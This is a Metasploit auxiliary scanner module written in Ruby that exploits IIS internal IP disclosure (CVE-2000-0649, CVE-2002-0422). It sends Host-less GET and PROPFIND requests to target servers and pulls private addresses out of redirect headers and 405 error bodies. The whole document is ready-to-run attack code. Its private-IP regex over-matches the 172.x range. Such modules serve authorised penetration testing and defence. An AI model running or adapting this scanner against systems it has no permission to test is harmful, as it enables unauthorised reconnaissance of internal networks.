Microsoft IIS HTTP Internal IP Disclosure

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Microsoft IIS HTTP Internal IP Disclosure',  
'Description' => %q{  
Collect any leaked internal IPs by requesting commonly redirected locations from IIS.  
CVE-2000-0649 references IIS 5.1 (win2k, XP) and older. However, in newer servers  
such as IIS 7+, this occurs when the alternateHostName is not set or misconfigured. Also  
collects internal IPs leaked from the PROPFIND method in certain IIS versions.  
},  
'Author' => [  
'Heather Pilkington',  
'Matthew Dunn - k0pak4'  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2000-0649'],  
['CVE', '2002-0422'],  
['BID', '1499'],  
['EDB', '20096'],  
['URL', 'https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content'], # iis 4,5,5.1  
['URL', 'https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e'], # iis 7+  
['URL', 'https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500']  
]  
)  
)  
end  
  
def run_host(target_host)  
uris = ['/', '/images', '/default.htm']  
methods = ['GET', 'PROPFIND']  
  
uris.each do |uri|  
# Must use send_recv() in order to send a HTTP request without the 'Host' header  
vhost_status = datastore['VHOST'].blank? ? '' : " against #{vhost}"  
vprint_status("#{peer} - Requesting #{uri}#{vhost_status}")  
  
methods.each do |method|  
c = connect  
request = c.request_cgi(  
'uri' => uri,  
'method' => method,  
'headers' => { 'Host' => '' }  
)  
res = c.send_recv(request, 25)  
intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i  
  
if res.nil?  
print_error("no response for #{target_host}")  
elsif ((res.code > 300) && (res.code < 310))  
vprint_good("Location Header: #{res.headers['Location']}")  
result = res.headers['Location'].scan(intipregex).uniq.flatten  
  
if !result.empty?  
print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")  
end  
elsif res.code == 405  
result = res.body.scan(intipregex).uniq.flatten  
if !result.empty?  
print_good("Result for #{target_host}#{uri} with method #{method}. Found Internal IP: #{result.first}")  
end  
end  
  
next if result.nil?  
  
report_note({  
host: target_host,  
port: rport,  
proto: 'tcp',  
sname: (ssl ? 'https' : 'http'),  
type: 'iis.ip',  
data: result.first  
})  
end  
end  
end  
end  
`